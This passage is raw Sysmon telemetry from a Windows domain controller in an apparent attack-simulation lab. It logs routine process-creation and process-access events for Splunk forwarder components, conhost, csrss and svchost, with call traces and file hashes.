Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.531{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5658-6008-0907-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.531{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.531{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.531{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.531{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.531{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5658-6008-0907-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.531{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5658-6008-0907-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.533{7901BC46-5658-6008-0907-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:08.109{7901BC46-5657-6008-0807-00000000A301}79607612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.563{7901BC46-5659-6008-0A07-00000000A301}72727668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.422{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5659-6008-0A07-00000000A301}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.422{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.422{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.422{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.422{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.422{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5659-6008-0A07-00000000A301}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.422{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5659-6008-0A07-00000000A301}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:09.423{7901BC46-5659-6008-0A07-00000000A301}7272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-565A-6008-0C07-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-565A-6008-0C07-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-565A-6008-0C07-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.844{7901BC46-565A-6008-0C07-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.234{7901BC46-565A-6008-0B07-00000000A301}22805712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.094{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-565A-6008-0B07-00000000A301}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 